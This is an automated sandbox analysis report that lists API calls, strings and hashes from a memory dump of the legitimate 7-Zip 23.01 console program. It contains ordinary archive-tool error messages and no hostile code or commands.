                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: BufferConsoleExceptionHandleInfoScreenThrowfputcfputs
                                • String ID: 7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20$ || $ : $7-Zip cannot find the code that works with archives.$Can't load module: $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$Libs:$Unsupported archive type$offset=$wudn
                                • API String ID: 3360184521-3863618374
                                • Opcode ID: 5560867a0da503c677f0d4b6f5028a4d00209056cddc71ea0216c80371a3413d
                                • Instruction ID: f8d32fa580d87320b321fa6ab503c5d7737f7f4df6618ef15f5379672ebbebca
                                • Opcode Fuzzy Hash: 5560867a0da503c677f0d4b6f5028a4d00209056cddc71ea0216c80371a3413d
                                • Instruction Fuzzy Hash: 718282B6308A8186DB24EF26E49039E7361F785B88F40411BDB8E47B59DF7CC949C749
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$ErrorLastmemmove$malloc
                                • String ID:
                                • API String ID: 707025802-0
                                • Opcode ID: 52c1df7397043974769d64c47c4ad03f3668cbe00846540f0b514377cd4b960e
                                • Instruction ID: 774466f5da32a8faa8f3691c365cbc9b4be7c15cd1b7f3d3ea42a450deff4665
                                • Opcode Fuzzy Hash: 52c1df7397043974769d64c47c4ad03f3668cbe00846540f0b514377cd4b960e
                                • Instruction Fuzzy Hash: 74929F32644B8886CB20EB22E5903AEA361F7C9B84F546117DF9D57B19DF7CC891CB48
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLastmemset
                                • String ID: Cannot find archive file$The item is a directory
                                • API String ID: 4217778428-1569138187
                                • Opcode ID: 5af5bbfc515d3b7441938e7c71afb3910a4a027ab430430eb7bb26be87f64f2f
                                • Instruction ID: f2f5bb066131f1f5d0b4c39b7a4567a7ac087bcd968eba5d65f3311795ab55e3
                                • Opcode Fuzzy Hash: 5af5bbfc515d3b7441938e7c71afb3910a4a027ab430430eb7bb26be87f64f2f
                                • Instruction Fuzzy Hash: 4C728E33249BC986CB30EB26E49429EA361F7C9B84F145116DE9E87B59DF3CC591CB08
                                APIs
                                Strings
                                • Cannot create output directory, xrefs: 0043D7A2
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowmemmove$malloc
                                • String ID: Cannot create output directory
                                • API String ID: 159934335-1181934277
                                • Opcode ID: d07fb803fdde0e9ce25cb8ea744738adf1a058334bec32f4f047af4c6aacca0b
                                • Instruction ID: f5f5c5aa5a881306e95dce41f89c51d1dcc936771875771750f28502cf114d9c
                                • Opcode Fuzzy Hash: d07fb803fdde0e9ce25cb8ea744738adf1a058334bec32f4f047af4c6aacca0b
                                • Instruction Fuzzy Hash: 70428F32649AC992CB30EB36F59039EA361F789784F445117DE9D47B19DE3CC8A5CB08
                                APIs
                                Strings
                                • Unsupported command:, xrefs: 004251C5
                                • I won't write data and program's messages to same stream, xrefs: 00425AA3, 00425D98
                                • Cannot use absolute pathnames for this command, xrefs: 004258E8
                                • The command must be specified, xrefs: 0042515E
                                • Cannot find archive name, xrefs: 0042558E
                                • -ai switch is not supported for this command, xrefs: 00425BB4
                                • Unsupported -spf:, xrefs: 004252DF
                                • stdout mode and email mode cannot be combined, xrefs: 00425D26
                                • I won't write compressed data to a terminal, xrefs: 00425D57
                                • Incorrect number of benchmark iterations, xrefs: 00425E5F
                                • Only one archive can be created with rename command, xrefs: 00425DF7
                                • Unsupported -snz:, xrefs: 00425953
                                • Archive name cannot by empty, xrefs: 004255D4
                                • Unsupported -spm:, xrefs: 0042552D
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow$wcscmp$free
                                • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect number of benchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -snz:$Unsupported -spf:$Unsupported -spm:$Unsupported command:$stdout mode and email mode cannot be combined
                                • API String ID: 225321437-2319225105
                                • Opcode ID: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                                • Instruction ID: a7789aaf9232d1842cfbfd2da2e1e8ad18810b17950c7acbcc9baaa189b545d6
                                • Opcode Fuzzy Hash: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                                • Instruction Fuzzy Hash: AC82B1B3304AC0A6DB28CB29E5803EEBB61F355784F888057D79947B25DB7CD5A9C708
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0793fe45066a34d6d5cd66e6672ae7da3db77f5e7ca3707c0a85dc2c1ae100a2
                                • Instruction ID: d4ce7193940798983e491c658e2417b292a25fb0ac4d531958a477d915161f3d
                                • Opcode Fuzzy Hash: 0793fe45066a34d6d5cd66e6672ae7da3db77f5e7ca3707c0a85dc2c1ae100a2
                                • Instruction Fuzzy Hash: 3F42A036209AC886DB20EB36E1906AF7764F385B8CF855007DE9A87B15DF7CC499C709

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph for the function at 41798c; the rendered graph is not recoverable as text. API calls visible on the graph nodes: CreateDirectoryW, GetLastError, free]
                                APIs
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNELBASE ref: 004186EA
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNEL32 ref: 00418721
                                  • Part of subcall function 004186C8: free.MSVCRT ref: 0041872E
                                • free.MSVCRT ref: 00417CC0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AttributesFilefree
                                • String ID:
                                • API String ID: 1936811914-0
                                • Opcode ID: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                                • Instruction ID: 0d2654d05cc18fa3c60727f9aa4824fc173849ffc6865b095d40e616d3abd9c7
                                • Opcode Fuzzy Hash: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                                • Instruction Fuzzy Hash: CD81A43225C58982CB20EB22E4413EE6331FBC5788F501217EE9E87669EF6CC9D5C749
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeSecurityPrivilege
                                • API String ID: 1313864721-2333288578
                                • Opcode ID: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                                • Instruction ID: 9bccead4449ac0a1ba8216579694df36e7b4d5fcfce69d6d7750917339131d60
                                • Opcode Fuzzy Hash: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                                • Instruction Fuzzy Hash: CC1151B230AB84C2DA019B22F95436EB366FBC4B81FD50106EA8F82E58CF7CC449C714
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0041BD1C
                                • OpenProcessToken.ADVAPI32 ref: 0041BD2D
                                • LookupPrivilegeValueW.ADVAPI32 ref: 0041BD41
                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,?,004239B9), ref: 0041BD78
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,004239B9), ref: 0041BD82
                                • CloseHandle.KERNELBASE ref: 0041BD92
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                • String ID:
                                • API String ID: 3398352648-0
                                • Opcode ID: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                                • Instruction ID: 3541f036d73c18f9c40b7543d5810b06082f498d25c01de213c7dfa98a2fad8e
                                • Opcode Fuzzy Hash: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                                • Instruction Fuzzy Hash: 550152B2619681C7DB108FB0F88479E7361F780B95F545535EB8A83654CF3CC449CB44
                                APIs
                                  • Part of subcall function 004182EC: FindClose.KERNELBASE ref: 004182FE
                                • FindFirstFileW.KERNELBASE ref: 0041835A
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • FindFirstFileW.KERNELBASE ref: 0041839A
                                • free.MSVCRT ref: 004183A8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Find$FileFirstfree$Closememmove
                                • String ID:
                                • API String ID: 2921071498-0
                                • Opcode ID: 478098d449921422a8781cf95dc01b92ef8f41cc977b03dca469aad60f3efd98
                                • Instruction ID: b5330e60c54956cc50c9f08ca021fb0d9c050131b3b6734f2e099aa56915e952
                                • Opcode Fuzzy Hash: 478098d449921422a8781cf95dc01b92ef8f41cc977b03dca469aad60f3efd98
                                • Instruction Fuzzy Hash: C1213C72204A8486DB21DF25E84039A6364F789BB8F544316EABD477D9DF3DC986C704

                                 Control-flow Graph
                                 (rendered graph omitted: control-flow graph of the function with entry block 46971a, blocks marked executed / not executed; the node and edge list is not reproduced)
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowfputs$fputc
                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                • API String ID: 1639683984-435538426
                                • Opcode ID: 0e070eb633bd7c910bb6203619f98dd6c0f55f65c104b89efa42c83942ccc977
                                • Instruction ID: c812a3d05c93557c2d33ee454497fa17e5836bf81c98cd5f3f4a8df3f8abd592
                                • Opcode Fuzzy Hash: 0e070eb633bd7c910bb6203619f98dd6c0f55f65c104b89efa42c83942ccc977
                                • Instruction Fuzzy Hash: 5E729E72209AC195DB34EB26E5903DEB360F785788F44412BDA8D43B19EF7CC5A5CB0A

                                 Control-flow Graph
                                 (rendered graph omitted: control-flow graph of the function with entry block 469dfd, blocks marked executed / not executed; the node and edge list is not reproduced)
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputcfputsfree
                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                • API String ID: 2822829076-727241755
                                • Opcode ID: c988a466015cf378610806e387c109d2c9731fd235777e19d3319dcfc8bf9c38
                                • Instruction ID: f66a1de4e5088d47387b6db332f459de391e60e4f94ef2e0fc9e4285461c67c5
                                • Opcode Fuzzy Hash: c988a466015cf378610806e387c109d2c9731fd235777e19d3319dcfc8bf9c38
                                • Instruction Fuzzy Hash: 14229E72309AC191CA34EB26E5903DEB360F785B88F44412BDA9D43B59DF7CC5A5CB0A

                                 Control-flow Graph
                                 (rendered graph omitted: control-flow graph of the function with entry block 448cbc, blocks marked executed / not executed; the node and edge list is not reproduced)
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                • API String ID: 190572456-3984264347
                                • Opcode ID: 5b5e39a2a957b3a1a0cc6a0261fd3ec0937b74eaee6952ee97da04c0b47041c8
                                • Instruction ID: 0b50d40484bf0200c9e1398aea2bcf31b8164620e4de11de8e092592918e11b3
                                • Opcode Fuzzy Hash: 5b5e39a2a957b3a1a0cc6a0261fd3ec0937b74eaee6952ee97da04c0b47041c8
                                • Instruction Fuzzy Hash: 58E15272259AC496DB20EB22E84079FB3A5F7C5B84F400517EA8E87B19DF7CC955CB08
                                APIs
                                  • Part of subcall function 0042A7E4: free.MSVCRT ref: 0042A987
                                • free.MSVCRT ref: 0042AD79
                                • free.MSVCRT ref: 0042ADFE
                                • free.MSVCRT ref: 0042AE8E
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA50
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA58
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA8F
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AA97
                                  • Part of subcall function 0042A9FC: free.MSVCRT ref: 0042AAA5
                                • free.MSVCRT ref: 0042AEE8
                                • free.MSVCRT ref: 0042AF13
                                • free.MSVCRT ref: 0042AF2A
                                • free.MSVCRT ref: 0042AF5B
                                • free.MSVCRT ref: 0042AF9C
                                  • Part of subcall function 0042728C: free.MSVCRT ref: 004275ED
                                • free.MSVCRT ref: 0042B56F
                                Strings
                                • Cannot set length for output file, xrefs: 0042B389
                                • Cannot seek to begin of file, xrefs: 0042B3D8
                                • Cannot open output file, xrefs: 0042B19B
                                • Cannot create hard link, xrefs: 0042B0CC
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot create hard link$Cannot open output file$Cannot seek to begin of file$Cannot set length for output file
                                • API String ID: 1294909896-1337951305
                                • Opcode ID: aa3669d20ec57e454436983b0db19a1aa14331c377f79012aa6f7e83b80124e7
                                • Instruction ID: 2641184b3cd2e4dff1fe49d3944e41f69cff72732fc0d07601fb00a7f7e0e7dc
                                • Opcode Fuzzy Hash: aa3669d20ec57e454436983b0db19a1aa14331c377f79012aa6f7e83b80124e7
                                • Instruction Fuzzy Hash: DC32E472308AD496CB14EF25F5902AE7720F785B84F844127EB9A47B15CF6CC8A6C349

                                 Control-flow Graph
                                 (rendered graph omitted: control-flow graph of the function with entry block 423760, blocks marked executed / not executed; the node and edge list is not reproduced)
                                APIs
                                Strings
                                • Unsupported switch postfix -bb, xrefs: 00423958
                                • : ERROR : , xrefs: 00423B52
                                • Unsupported switch postfix -stm, xrefs: 00423AF6
                                • SeCreateSymbolicLinkPrivilege, xrefs: 004239BB
                                • Unsupported switch postfix for -slp, xrefs: 00423A26
                                • Set process affinity mask: , xrefs: 00423AAE
                                • SeLockMemoryPrivilege, xrefs: 00423A60
                                • SeRestorePrivilege, xrefs: 004239AD
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                • String ID: : ERROR : $SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                • API String ID: 1978914637-1912842784
                                • Opcode ID: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                                • Instruction ID: 962a4ccdc1210d561e36a3e0db8bc1f2aea4c8acf84196363b7e0669f585bddd
                                • Opcode Fuzzy Hash: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                                • Instruction Fuzzy Hash: 0DC149B330868499DB21DF26E48039D7B71F795B88F888166EB8D47725DB3CCA95C708

                                 Control-flow Graph
                                 (rendered graph omitted: control-flow graph of the function with entry block 4188ec, blocks marked executed / not executed; the node and edge list is not reproduced)
                                APIs
                                  • Part of subcall function 004135B8: memmove.MSVCRT ref: 004135F0
                                • free.MSVCRT ref: 00418BCA
                                • free.MSVCRT ref: 00418BFA
                                • free.MSVCRT ref: 00418C05
                                • free.MSVCRT ref: 00418C1A
                                • free.MSVCRT ref: 00418CC7
                                  • Part of subcall function 004188EC: SetLastError.KERNEL32 ref: 00418C2A
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418C36
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418C41
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418C56
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418CD8
                                  • Part of subcall function 004188EC: free.MSVCRT ref: 00418CE3
                                • free.MSVCRT ref: 00418C9A
                                • free.MSVCRT ref: 00418CA5
                                • free.MSVCRT ref: 00418CBA
                                • wcscmp.MSVCRT ref: 00418F34
                                • free.MSVCRT ref: 00418F54
                                • free.MSVCRT ref: 00418FA0
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • free.MSVCRT ref: 00418FDE
                                  • Part of subcall function 004182EC: FindClose.KERNELBASE ref: 004182FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$CloseErrorFindLastwcscmp
                                • String ID: :$:$DATA$\
                                • API String ID: 2757989841-1004618218
                                • Opcode ID: 05d3dba421aa1cb443c381141900eb5aba611e133aa90caca10377ea91583d8e
                                • Instruction ID: c845cbb13752e57a59e9137e8ad3387a3eaaf93a16a11e3db970e01400aa8f66
                                • Opcode Fuzzy Hash: 05d3dba421aa1cb443c381141900eb5aba611e133aa90caca10377ea91583d8e
                                • Instruction Fuzzy Hash: 5412D07210968096CB20EF26D4902AEB761F795744F80821FE79E87B65DF3CC4E6CB09

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 463c48-463c79]
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$FreeString$fputcfree
                                • String ID: = $--$----$Path$PvG$Type$Warning: The archive is open with offset
                                • API String ID: 2701146716-2323763876
                                • Opcode ID: f43c4620d8d8a3c28b4e7786d7024dc72ec64756f072e8b8e9cbd45f56a53a34
                                • Instruction ID: 361afc234045d79ae50dea2bdaeb93c8cba25ada6b6846ce091f3393e41c87c3
                                • Opcode Fuzzy Hash: f43c4620d8d8a3c28b4e7786d7024dc72ec64756f072e8b8e9cbd45f56a53a34
                                • Instruction Fuzzy Hash: 29915676218A8592DB14DF26E9447AA7321F785BC9F405027EF4E43B28EF3CC95AC709

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 42728c-4272df]
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Cannot create file with auto name$Cannot delete output file$Cannot delete output folder$Cannot rename existing file
                                • API String ID: 1294909896-3443351061
                                • Opcode ID: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                                • Instruction ID: 6684b840346afc15de165b281c28b7ca4cb80a56bbf09ae61e5682da71cc1474
                                • Opcode Fuzzy Hash: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                                • Instruction Fuzzy Hash: 87A1B67234C6A592DB20EF26F4903EEA361F785784F900117EB9A87B15DE6CC896C70D

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 46a6e3-46a6ef]
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
